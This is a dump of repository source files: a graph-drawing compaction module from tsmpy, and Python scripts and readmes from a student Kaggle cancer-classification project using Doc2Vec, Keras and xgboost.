"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from copy import deepcopy\nfrom .flownet import Flow_net\nfrom tsmpy.dcel import Dcel\nimport networkx as nx\n\n\nclass Compaction:\n \"\"\"\n Assign minimum lengths to the segments of the edges of the orthogonal representation.\n \"\"\"\n\n def __init__(self, ortho):\n self.planar = ortho.planar\n self.G = self.planar.G\n self.dcel = self.planar.dcel\n\n flow_dict = deepcopy(ortho.flow_dict)\n self.bend_point_processor(flow_dict)\n ori_edges = list(self.G.edges)\n halfedge_side = self.face_side_processor(flow_dict)\n self.refine_faces(halfedge_side)\n\n halfedge_length = self.tidy_rectangle_compaction(halfedge_side)\n self.pos = self.layout(halfedge_side, halfedge_length)\n self.remove_dummy()\n self.G.add_edges_from(ori_edges)\n\n def bend_point_processor(self, flow_dict):\n \"\"\"Create bend nodes. Modify self.G, self.dcel and flow_dict\"\"\"\n bends = {} # left to right\n for he in self.dcel.half_edges.values():\n lf, rf = he.twin.inc, he.inc\n flow = flow_dict[lf.id][rf.id][he.id]\n if flow > 0:\n bends[he] = flow\n\n idx = 0\n # (u, v) -> (u, bend0, bend1, ..., v)\n for he, num_bends in bends.items():\n # Q: what if there are bends on both (u, v) and (v, u)?\n # A: Impossible, not a min cost\n u, v = he.get_points()\n lf_id, rf_id = he.twin.inc.id, he.inc.id\n\n self.G.remove_edge(u, v)\n # use ('bend', idx) to represent bend node\n flow_dict[u][rf_id][u,\n ('bend', idx)] = flow_dict[u][rf_id].pop((u, v))\n\n for i in range(num_bends):\n cur_node = ('bend', idx)\n pre_node = ('bend', idx - 1) if i > 0 else u\n nxt_node = ('bend', idx + 1) if i < num_bends - 1 else v\n self.G.add_edge(pre_node, cur_node)\n self.dcel.add_node_between(\n pre_node, cur_node, v\n )\n flow_dict.setdefault(cur_node, {}).setdefault(\n lf_id, {})[cur_node, pre_node] = 1\n flow_dict.setdefault(cur_node, {}).setdefault(\n rf_id, {})[cur_node, nxt_node] = 3\n idx += 1\n\n flow_dict[v][lf_id][v,\n ('bend', idx - 1)] = flow_dict[v][lf_id].pop((v, u))\n self.G.add_edge(('bend', idx - 1), v)\n\n def refine_faces(self, halfedge_side):\n \"\"\"Make face rectangle, create dummpy nodes.\n Modify self.G, self.dcel, halfedge_side\n \"\"\"\n\n def find_front(init_he, target): # first\n cnt = 0\n for he in init_he.traverse():\n side, next_side = halfedge_side[he], halfedge_side[he.succ]\n if side == next_side: # go straight\n pass\n elif (side + 1) % 4 == next_side: # go right\n cnt += 1\n elif (side + 2) % 4 == next_side: # go back\n cnt -= 2\n else: # go left\n cnt -= 1\n if cnt == target:\n return he.succ\n raise Exception(f\"can't find front edge of {init_he}\")\n\n def refine_internal(face):\n \"\"\"Insert only one edge to make face more rect\"\"\"\n for he in face.surround_half_edges():\n side, next_side = halfedge_side[he], halfedge_side[he.succ]\n if side != next_side and (side + 1) % 4 != next_side:\n front_he = find_front(he, 1)\n extend_node_id = he.twin.ori.id\n\n l, r = front_he.ori.id, front_he.twin.ori.id\n he_l2r = self.dcel.half_edges[l, r]\n dummy_node_id = (\"dummy\", extend_node_id)\n self.G.remove_edge(l, r)\n self.G.add_edge(l, dummy_node_id)\n self.G.add_edge(dummy_node_id, r)\n\n face = self.dcel.half_edges[l, r].inc\n self.dcel.add_node_between(l, dummy_node_id, r)\n he_l2d = self.dcel.half_edges[l, dummy_node_id]\n he_d2r = self.dcel.half_edges[dummy_node_id, r]\n halfedge_side[he_l2d] = halfedge_side[he_l2r]\n halfedge_side[he_l2d.twin] = (\n halfedge_side[he_l2r] + 2) % 4\n halfedge_side[he_d2r] = halfedge_side[he_l2r]\n halfedge_side[he_d2r.twin] = (\n halfedge_side[he_l2r] + 2) % 4\n halfedge_side.pop(he_l2r)\n halfedge_side.pop(he_l2r.twin)\n\n self.G.add_edge(dummy_node_id, extend_node_id)\n self.dcel.connect(face, extend_node_id,\n dummy_node_id, halfedge_side, halfedge_side[he])\n\n he_e2d = self.dcel.half_edges[extend_node_id,\n dummy_node_id]\n lf, rf = he_e2d.twin.inc, he_e2d.inc\n halfedge_side[he_e2d] = halfedge_side[he]\n halfedge_side[he_e2d.twin] = (halfedge_side[he] + 2) % 4\n\n refine_internal(lf)\n refine_internal(rf)\n break\n\n def build_border(G, dcel, halfedge_side):\n \"\"\"Create border dcel\"\"\"\n border_nodes = [(\"dummy\", -i) for i in range(1, 5)]\n border_edges = [(border_nodes[i], border_nodes[(i + 1) % 4])\n for i in range(4)]\n border_G = nx.Graph(border_edges)\n border_side_dict = {}\n is_planar, border_embedding = nx.check_planarity(border_G)\n border_dcel = Dcel(border_G, border_embedding)\n ext_face = border_dcel.half_edges[(\n border_nodes[0], border_nodes[1])].twin.inc\n border_dcel.ext_face = ext_face\n ext_face.is_external = True\n\n for face in list(border_dcel.faces.values()):\n if not face.is_external:\n for i, he in enumerate(face.surround_half_edges()):\n he.inc = self.dcel.ext_face\n halfedge_side[he] = i # assign side\n halfedge_side[he.twin] = (i + 2) % 4\n border_side_dict[i] = he\n border_dcel.faces.pop(face.id)\n border_dcel.faces[self.dcel.ext_face.id] = self.dcel.ext_face\n else:\n # rename border_dcel.ext_face's name\n border_dcel.faces.pop(face.id)\n face.id = (\"face\", -1)\n border_dcel.faces[face.id] = face\n G.add_edges_from(border_edges)\n\n # merge border dcel into self.dcel\n dcel.vertices.update(border_dcel.vertices)\n dcel.half_edges.update(border_dcel.half_edges)\n dcel.faces.update(border_dcel.faces)\n dcel.ext_face.is_external = False\n dcel.ext_face = border_dcel.ext_face\n return border_side_dict\n\n ori_ext_face = self.dcel.ext_face\n border_side_dict = build_border(self.G, self.dcel, halfedge_side)\n\n for he in ori_ext_face.surround_half_edges():\n extend_node_id = he.succ.ori.id\n side, next_side = halfedge_side[he], halfedge_side[he.succ]\n if next_side != side and next_side != (side + 1) % 4:\n if len(self.G[extend_node_id]) <= 2:\n front_he = border_side_dict[(side + 1) % 4]\n dummy_node_id = (\"dummy\", extend_node_id)\n l, r = front_he.ori.id, front_he.twin.ori.id\n he_l2r = self.dcel.half_edges[l, r]\n # process G\n self.G.remove_edge(l, r)\n self.G.add_edge(l, dummy_node_id)\n self.G.add_edge(dummy_node_id, r)\n self.G.add_edge(dummy_node_id, extend_node_id)\n\n # # process dcel\n\n self.dcel.add_node_between(l, dummy_node_id, r)\n self.dcel.connect_diff(\n ori_ext_face, extend_node_id, dummy_node_id)\n\n he_e2d = self.dcel.half_edges[extend_node_id,\n dummy_node_id]\n he_l2d = self.dcel.half_edges[l, dummy_node_id]\n he_d2r = self.dcel.half_edges[dummy_node_id, r]\n # process halfedge_side\n halfedge_side[he_l2d] = halfedge_side[he_l2r]\n halfedge_side[he_l2d.twin] = (\n halfedge_side[he_l2r] + 2) % 4\n halfedge_side[he_d2r] = halfedge_side[he_l2r]\n halfedge_side[he_d2r.twin] = (\n halfedge_side[he_l2r] + 2) % 4\n\n halfedge_side[he_e2d] = halfedge_side[he]\n halfedge_side[he_e2d.twin] = (halfedge_side[he] + 2) % 4\n halfedge_side.pop(he_l2r)\n halfedge_side.pop(he_l2r.twin)\n break\n else:\n raise Exception(\"not connected\")\n\n for face in list(self.dcel.faces.values()):\n if face.id != (\"face\", -1):\n refine_internal(face)\n\n def face_side_processor(self, flow_dict):\n \"\"\"Give flow_dict, assign halfedges with face sides\"\"\"\n\n halfedge_side = {}\n\n def set_side(init_he, side):\n for he in init_he.traverse():\n halfedge_side[he] = side\n angle = flow_dict[he.succ.ori.id][he.inc.id][he.succ.id]\n if angle == 1:\n # turn right in internal face or turn left in external face\n side = (side + 1) % 4\n elif angle == 3:\n side = (side + 3) % 4\n elif angle == 4: # a single edge\n side = (side + 2) % 4\n\n for he in init_he.traverse():\n if he.twin not in halfedge_side:\n set_side(he.twin, (halfedge_side[he] + 2) % 4)\n\n set_side(self.dcel.ext_face.inc, 0)\n return halfedge_side\n\n def tidy_rectangle_compaction(self, halfedge_side):\n \"\"\"\n Compute every edge's length, depending on halfedge_side\n \"\"\"\n\n def build_flow(target_side):\n flow = Flow_net()\n for he, side in halfedge_side.items():\n if side == target_side:\n lf, rf = he.twin.inc, he.inc\n lf_id = lf.id\n rf_id = rf.id if not rf.is_external else ('face', 'end')\n flow.add_edge(lf_id, rf_id, he.id)\n return flow\n\n def min_cost_flow(flow, source, sink):\n if not flow:\n return {}\n for node in flow:\n flow.nodes[node]['demand'] = 0\n flow.nodes[source]['demand'] = -2 ** 32\n flow.nodes[sink]['demand'] = 2 ** 32\n for lf_id, rf_id, he_id in flow.edges:\n # TODO: what if selfloop?\n flow.edges[lf_id, rf_id, he_id]['weight'] = 1\n flow.edges[lf_id, rf_id, he_id]['lowerbound'] = 1\n flow.edges[lf_id, rf_id, he_id]['capacity'] = 2 ** 32\n flow.add_edge(source, sink, 'extend_edge',\n weight=0, lowerbound=0, capacity=2 ** 32)\n\n return flow.min_cost_flow()\n\n hor_flow = build_flow(1) # up -> bottom\n ver_flow = build_flow(0) # left -> right\n\n hor_flow_dict = min_cost_flow(\n hor_flow, self.dcel.ext_face.id, ('face', 'end'))\n ver_flow_dict = min_cost_flow(\n ver_flow, self.dcel.ext_face.id, ('face', 'end'))\n\n halfedge_length = {}\n\n for he, side in halfedge_side.items():\n if side in (0, 1):\n rf = he.inc\n rf_id = ('face', 'end') if rf.is_external else rf.id\n lf_id = he.twin.inc.id\n\n if side == 0:\n hv_flow_dict = ver_flow_dict\n else:\n hv_flow_dict = hor_flow_dict\n\n length = hv_flow_dict[lf_id][rf_id][he.id]\n halfedge_length[he] = length\n halfedge_length[he.twin] = length\n\n return halfedge_length\n\n def layout(self, halfedge_side, halfedge_length):\n \"\"\" return pos of self.G\"\"\"\n pos = {}\n\n def set_coord(init_he, x, y):\n for he in init_he.traverse():\n pos[he.ori.id] = (x, y)\n side = halfedge_side[he]\n length = halfedge_length[he]\n if side == 1:\n x += length\n elif side == 3:\n x -= length\n elif side == 0:\n y += length\n else:\n y -= length\n\n for he in init_he.traverse():\n for e in he.ori.surround_half_edges():\n if e.twin.ori.id not in pos:\n set_coord(e, *pos[e.ori.id])\n\n set_coord(self.dcel.ext_face.inc, 0, 0)\n return pos\n\n def remove_dummy(self):\n for node in list(self.G.nodes):\n if type(node) is tuple and len(node) > 1:\n if node[0] == \"dummy\":\n self.G.remove_node(node)\n self.pos.pop(node, None)\n"
}
] | 15 |
qqu0127/UCLA-CS249-Project | https://github.com/qqu0127/UCLA-CS249-Project | 20975c46c397000d1934bbcbf5014f06497b1a6a | 0c5a2e8ac36215181df2158c9b922dc1545f9d6d | 0127afeb9b92ae8b3e8305cc5e076fa34731f682 | refs/heads/master | 2021-08-23T00:54:43.259602 | 2017-12-02T00:26:08 | 2017-12-02T00:26:08 | 112,370,911 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6533622741699219,
"alphanum_fraction": 0.681995689868927,
"avg_line_length": 34.43077087402344,
"blob_id": "e59d8772f50d040251fa9a75378f4bfbdbfe3e64",
"content_id": "27a24c746bb524905213f4983aacfeed42793c2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2305,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 65,
"path": "/UCLA-CS249-Project/src/enhanced.py",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 10 22:21:28 2017\n\n@author: zhuya\n\"\"\"\nimport numpy as np\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras import optimizers \n\ntrain_code = np.hstack((truncated_one_hot_gene[:train_size], truncated_one_hot_variation[:train_size]))\ntest_code = np.hstack((truncated_one_hot_gene[train_size:], truncated_one_hot_variation[train_size:]))\ntotal_code = np.concatenate((train_code, test_code), axis=0)\ntotal_text_arrays = np.concatenate((text_train_arrays,text_test_arrays),axis = 0)\n\ndef dictionary_model():\n model = Sequential()\n model.add(Dense(256, input_dim= Gene_INPUT_DIM*2, init='normal', activation='relu'))\n model.add(Dropout(0.3))\n model.add(Dense(512, init='normal', activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(200, init='normal', activation='linear'))\n \n #optimizer = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True) original type\n optimizer = optimizers.Adadelta(lr=3, rho=0.95, epsilon=1e-08, decay=0.0) \n model.compile(loss='mean_squared_error', optimizer=optimizer)\n return model\n\ndicmodel = dictionary_model()\ndicmodel.summary()\nbest_loss = 1e300\nfor i in range(20):\n estimator = dicmodel.fit(total_code, total_text_arrays, epochs=5, batch_size=64)\n dic_loss = dicmodel.evaluate(x = test_code, y=text_test_arrays)\n print(\"\")\n print(\"test loss: %.4f\" % dic_loss)\n if (dic_loss < best_loss):\n best_loss = dic_loss\n dicmodel.save_weights('best_weight.h5')\n\nprint(\"best loss: %.4f\" % best_loss)\n\n\ndicmodel.load_weights('best_weight.h5')\ntrain_text_predict = dicmodel.predict(train_code)\ntest_text_predict = dicmodel.predict(test_code)\n\ntmp_distance = np.zeros((train_size))\ndic_train_id = np.zeros((train_size, 50))\ndic_test_id = np.zeros((test_size, 50))\n\nfor i in range(train_size):\n for j in range(train_size):\n tmp_distance[j] = np.sqrt(np.sum(np.square(train_text_predict[i] - text_train_arrays[j])))\n tmp_sort = np.argsort(tmp_distance)\n dic_train_id[i] = tmp_sort[:50]\n\n\nfor i in range(test_size):\n for j in range(train_size):\n tmp_distance[j] = np.sqrt(np.sum(np.square(test_text_predict[i] - text_train_arrays[j])))\n tmp_sort = np.argsort(tmp_distance)\n dic_test_id[i] = tmp_sort[:50] \n"
},
{
"alpha_fraction": 0.6230126619338989,
"alphanum_fraction": 0.6585825681686401,
"avg_line_length": 32.745452880859375,
"blob_id": "7ef4e4a09b44f7ac1d1cbae7db7f357275c6123e",
"content_id": "ed66e39b07fd4bd45fcf7212e9eb6ee88bfc6b60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3711,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 110,
"path": "/UCLA-CS249-Project/src/classification.py",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 30 22:50:07 2017\n\n@author: zhuya\n\"\"\"\n#import word_embedding as we \n\nimport pandas as pd\nimport numpy as np\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras import optimizers \n\ndef baseline_model():\n model = Sequential()\n model.add(Dense(256, input_dim=Text_INPUT_DIM+ Gene_INPUT_DIM*2, init='normal', activation='relu'))\n model.add(Dropout(0.3))\n model.add(Dense(256, init='normal', activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(80, init='normal', activation='relu'))\n model.add(Dense(9, init='normal', activation=\"softmax\"))\n \n #optimizer = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True) original type\n optimizer = optimizers.Adadelta(lr=0.5, rho=0.95, epsilon=1e-08, decay=0.0) \n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\nmodel = baseline_model()\nmodel.summary()\n'''\nbest_acc = 0\nfor i in range(30):\n estimator=model.fit(train_set, encoded_y, validation_split=0.2, epochs=2, batch_size=64)\n if (best_acc < estimator.history['val_acc'][-1] * 100):\n best_acc = estimator.history['val_acc'][-1] * 100\n model.save_weights('best_weight_predict_all.h5')\n \nprint(\"Training accuracy: %.2f%% / Best validation accuracy: %.2f%%\" % (100*estimator.history['acc'][-1], best_acc))\n'''\nmodel.load_weights('best_weight_predict_all.h5')\n'''\nimport matplotlib.pyplot as plt\nplt.plot(estimator.history['acc'])\nplt.plot(estimator.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'valid'], loc='upper left')\nplt.show()\n\n# summarize history for loss\nplt.plot(estimator.history['loss'])\nplt.plot(estimator.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'valid'], loc='upper left')\nplt.show()\n'''\n#predict for the new data\ny_pred = model.predict_proba(test_set) # [N, 9] probability\n\n#enha\nn = 50\n\na = 0.2\ny_predict_final = np.zeros((test_size, 9))\ny_predict_final += y_pred * (1 - a);\n\nfor i in range(test_size):\n for j in range(n):\n y_predict_final[i] += a/n * encoded_y[int(dic_test_id[i][j])]\n\n\n'''\ntrain_totaldata = np.zeros((train_size, 9 * (n+1)))\ntest_totaldata = np.zeros((test_size, 9 * (n+1)))\nfor i in range (train_size):\n train_totaldata[i][:9] = encoded_y[i]\n for j in range (n):\n train_totaldata[i][9 + j * 9 : 9 + (j + 1) * 9] = encoded_y[int(dic_train_id[i][j])]\n\nfor i in range (test_size):\n test_totaldata[i][:9] = y_pred[i]\n for j in range (n):\n test_totaldata[i][9 + j * 9 : 9 + (j + 1) * 9] = encoded_y[int(dic_test_id[i][j])]\n\ndef weight_model():\n model = Sequential()\n model.add(Dense(256, input_dim = 9 * (n+1), init='normal', activation='relu')) \n model.add(Dense(9, init='normal', activation=\"softmax\"))\n optimizer = optimizers.Adadelta(lr=0.5, rho=0.95, epsilon=1e-08, decay=0.0) \n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\nweightmodel = weight_model()\nweightmodel.summary()\nbest_acc = 0\nfor i in range(100):\n estimator = weightmodel.fit(train_totaldata, encoded_y, validation_split=0.2, epochs=1, batch_size=64)\n if (best_acc < estimator.history['val_acc'][-1] * 100):\n best_acc = estimator.history['val_acc'][-1] * 100\n #weightmodel.save_weights('best_weight_final.h5')\n \nprint(\"Training accuracy: %.2f%% / Best validation accuracy: %.2f%%\" % (100*estimator.history['acc'][-1], best_acc))\n#weightmodel.load_weights('best_weight_final.h5')\ny_predict_final = weightmodel.predict_proba(test_totaldata)\n'''"
},
{
"alpha_fraction": 0.7502160668373108,
"alphanum_fraction": 0.7787381410598755,
"avg_line_length": 54.07143020629883,
"blob_id": "59cfef4f5236d5eb587966678dcc0476c79a6039",
"content_id": "8abb319e7159a6a94e2649ca024ee3fd4a5d32e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2314,
"license_type": "no_license",
"max_line_length": 214,
"num_lines": 42,
"path": "/readme.txt",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "This code is for Kaggle competition: Personalized Medicine: Redefining Cancer Treatment\nThe codes are based on Mr. Aly Osama's open source code \"Doc2Vec with Keras(0.77)\" and we try to improve the results by make several changes to it.\n\nThe codes are python based and it's organized as follows:\nThe data_load.py load csv data\nThe data_preprocessing.py do data cleaning\nThe word_embedding.py do doc embedding by Doc2Vec;\nThe word_embedding_load.py is another way to get doc embedding: we load the existed word embedding trained on PubMed by Chiu.(2016) and trained doc vector based on these vectors.\nThe classification.py trained a classification model on word embedding;(now we use NN)\nThe xgboost_classifier.py using the xgboost tree to do the classfication;(using word embedding as input)\nThe xgb_dataprecessing.py is the code of https://www.kaggle.com/the1owl/redefining-treatment-0-57456, which use transform and fit_transform to do data preprocessing (we use it as the baseline of our xgboost method)\nThe testaccuracy.py calculation the test accuracy by the classification model we just trained;\nThe load_test.py load the stage-2 data and test the accuracy;\nThe enhanced.py and enhanced_baseline.py is some method I used to try to enhance the result.\n\n\nFor the data:\ndocEmbeddings_5_clean is the doc embedding get from doc2vec and trained for 5 epoch;\ndocEmbeddings_30_clean is the doc embedding get from doc2vec and trained for 30 epoch;\ndocEmbeddings_5_load is the doc embedding get from doc2vec with loaded word embedding and trained for 5 epoch(windows = 2);\ndocEmbeddings_30_load is the doc embedding get from doc2vec with loaded word embedding and trained for 30 epoch(windows = 2);\ndocEmbeddings_30_loadwin30 is the doc embedding get from doc2vec with loaded word embedding and trained for 30 epoch(windows = 30);\ndocEmbeddings_30_loads2 is the doc emdedding for the seconde tage data\ndocEmbeddings_30_loadall is using all the labeled data(both training, 1st stage, 2nd stage test data) to train embedding\n\nThe pre-trained word embedding: \nhttps://drive.google.com/drive/folders/1h0vK_ZibfgCFH_XCHqKA0aZs3jlj-37m?usp=sharing\n\n\n###################################\n#below added by Quincy @2017/11/28\n###################################\nDependencies:\np7zip\nwget\nRe\ngensim\nPandas\nnltk\nnumpy\nkeras\ntensorflow\n\n"
},
{
"alpha_fraction": 0.6813187003135681,
"alphanum_fraction": 0.6978021860122681,
"avg_line_length": 13,
"blob_id": "658f1998e43d296a46de70fa05fbdaee2af23c00",
"content_id": "f7976216e94937a8db256c0469237e06300c11c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 182,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 13,
"path": "/UCLA-CS249-Project/README.md",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "# Personalized-Medicine-Redefining-Cancer-Treatment\nUCLA-CS249-Project\n\n## Codes :\nAll codes in ./src/\n* util.py\n* demo.ipynb\n* baseline_classification.py\n...\n\n## Data :\n\n## Model :\n"
},
{
"alpha_fraction": 0.6273917555809021,
"alphanum_fraction": 0.6606243848800659,
"avg_line_length": 27.22857093811035,
"blob_id": "68db0114cadc738b8f30ed9914a4e1e84893136b",
"content_id": "cd924ef2bc39648bac832cb7d2ac3ebf2649c32a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 35,
"path": "/UCLA-CS249-Project/src/testaccuracy.py",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 30 23:13:01 2017\n\n@author: zhuya\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n#import classification as cl\n\ntest_solution = pd.read_csv(\"../data/stage_2_private_solution.csv\", sep = \",\")\ntest_id = test_solution['ID'].values\ntest_result = np.array(test_solution.drop('ID', axis = 1))\nactualsize = len(test_result)\n\npred = np.array(y_predict_final)\n\n#mysum = 0\nmyloss = 0\nfor i in range(actualsize):\n truth = np.argmax(test_result[i])\n #predict = np.argmax(pred[test_id[i]-1])\n #mysum += (truth == predict)\n myloss += -np.log(pred[test_id[i] - 1][truth])\n \n#accuracy = 100 * mysum / actualsize\naverageloss = myloss / actualsize\n\nprint(\"Test loss: %.2f \" % averageloss)\nsubmission = pd.DataFrame(pred)\nsubmission.insert(0, 'ID', test_x['ID'])\nsubmission.columns = ['ID','class1', 'class2', 'class3', 'class4', 'class5', 'class6', 'class7', 'class8', 'class9']\nsubmission.to_csv(\"submission_all.csv\",index=False)\nsubmission.head()\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5684143304824829,
"alphanum_fraction": 0.6099744439125061,
"avg_line_length": 26.38596534729004,
"blob_id": "3c92512871125362f60a56427e09b6f64718ee49",
"content_id": "c37857e1133cce08f641c2445db21a589c436e75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1564,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 57,
"path": "/UCLA-CS249-Project/src/xgboost_classifier.py",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 20 10:43:19 2017\n\n@author: zhuya\n\"\"\"\n# this script using xgboost to do the prediction\n\nimport xgboost as xgb\nimport sklearn\nimport pandas as pd\nimport numpy as np\n\nfold = 5\nevallist = []\ndenom = 0\n\n#for i in range(len(train_y)):\n #train_y[i] -=1 \n \nfor i in range(fold):\n params = {\n 'eta': 0.03333,\n 'max_depth': 8,\n 'objective': 'multi:softprob',\n 'eval_metric': 'mlogloss',\n 'num_class': 9,\n 'seed': i,\n 'silent': True\n }\n x1,x2,y1,y2 = sklearn.model_selection.train_test_split(train_set, train_y, test_size = 0.18, random_state = i)\n watchlist = [(xgb.DMatrix(x1,y1), 'train'), (xgb.DMatrix(x2, y2), 'valid')]\n model = xgb.train(params, xgb.DMatrix(x1, y1), 1000, watchlist, verbose_eval=50, early_stopping_rounds=100)\n score1 = sklearn.metrics.log_loss(y2, model.predict(xgb.DMatrix(x2), ntree_limit=model.best_ntree_limit), labels = list(range(9)))\n print(score1)\n pred = model.predict(xgb.DMatrix(test_set), ntree_limit=model.best_ntree_limit+80)\n y_final = pred.copy()\n #if score < 0.9:\n if denom != 0:\n pred = model.predict(xgb.DMatrix(test_set), ntree_limit=model.best_ntree_limit+80)\n y_final += pred\n denom += 1\n \ny_final /= denom\ny_predict_final = y_final\n'''\n#enhanced\nn = 5\n\na = 0.25\ny_predict_final = np.zeros((test_size, 9))\ny_predict_final += y_final * (1 - a);\n\nfor i in range(test_size):\n for j in range(n):\n y_predict_final[i] += a/n * encoded_y[int(dic_test_id[i][j])]\n'''\n\n\n\n"
},
{
"alpha_fraction": 0.7238232493400574,
"alphanum_fraction": 0.7286263108253479,
"avg_line_length": 29.130434036254883,
"blob_id": "e66e751950d6e8e1992dde7a6b4211c73b68102c",
"content_id": "e3c4bbfde06cbd4a7c9a2a6fd81ff93a25e5499d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2082,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 69,
"path": "/UCLA-CS249-Project/src/feature_selection_evaluation.py",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport tqdm\nimport string\nimport pandas as pd\nimport numpy as np\nimport util\nfrom sklearn.decomposition import TruncatedSVD\n#from data_preprocessing import *\nimport word_embedding_load as wel\nimport baseline_classification as bc\nimport matplotlib.pyplot as plt\n\nGENE_INPUT_DIM = 25\n\n\ndef runTextModelEval(textModelName = [], PATH = '../model/doc2vec/'):\n\t'''\n\tGiven a list of existed Text Model name, load them and get the baseline results one by one.\n\tBaseline evaluation please see baseline_classification.py\n\n\t@param:\n\t\ttextModelName, a list of TextModel name\n\t\tPATH, the path to the model TextModel folder, default set to be ../model/doc2vec/\n\t@return: null\n\n\t'''\n\n\t[all_data, train_size, test_size, train_x, train_y, test_x] = util.loadData()\n\tsentences = util.data_preprocess(all_data)\n\tsvd = TruncatedSVD(n_components=GENE_INPUT_DIM, random_state=12)\n\tfor textModel in textModelName:\n\n\t\ttry:\n\t\t\tmodel = wel.loadTextModel(PATH + textModel)\n\t\texcept:\n\t\t\tprint('Failed on ' + textModel)\n\t\t\tcontinue\n\t\tif model == None:\n\t\t\tprint('Failed on ' + textModel)\n\t\t\tcontinue\n\t\ttext_train_arrays, text_test_arrays = wel.getTextVec(model, train_size, test_size, 200)\n\t\ttruncated_one_hot_gene = wel.getGeneVec(all_data, svd)\n\t\ttruncated_one_hot_variation = wel.getVariationVec(all_data, svd)\n\t\ttrain_set = np.hstack((truncated_one_hot_gene[:train_size], truncated_one_hot_variation[:train_size], text_train_arrays))\n\t\ttest_set = np.hstack((truncated_one_hot_gene[train_size:], truncated_one_hot_variation[train_size:], text_test_arrays))\n\t\tencoded_y = pd.get_dummies(train_y)\n\t\tencoded_y = np.array(encoded_y)\n\n\t\tX = np.array(train_set)\n\t\ty = np.array(bc.getLabels(encoded_y))\n\t\tprint('Results for TextModel: ' + textModel)\n\t\tcm = bc.baseline(X, y)\n\n#TODO!\ndef runFeatLenEval(textModel, featLen = []):\n\t'''\n\tGiven textModel and a list of feature length, conduct truncated SVD to reduce the length of feature vector.\n\tThen running baseline evalution, please also see baseline_classification.py\n\n\t@param:\n\n\n\t'''\n\t\n\treturn\n\t\t\n"
}
] | 7 |
myriadrf/LoRa-SDR | https://github.com/myriadrf/LoRa-SDR | e3834f10b3591766395595acb507f98cc713e469 | c545c51e5e37284363a971ec298f72255646a6fa | 4c1f8fdec211bbd9e1dfb8ff560ca60cd9c43431 | refs/heads/master | 2021-06-11T03:33:02.681983 | 2021-03-01T09:34:12 | 2021-03-01T09:34:12 | 60,247,628 | 207 | 48 | null | 2016-06-02T08:46:11 | 2018-06-09T18:17:04 | 2018-06-10T12:48:43 | C++ | [
{
"alpha_fraction": 0.5742513537406921,
"alphanum_fraction": 0.592585027217865,
"avg_line_length": 35.90977478027344,
"blob_id": "ca31cc6a722849a66af99116fb91ad1a927cda5c",
"content_id": "8eb8fa4fda225aa6a83ddbf0a4632702010a4fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4909,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 133,
"path": "/TestLoopback.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
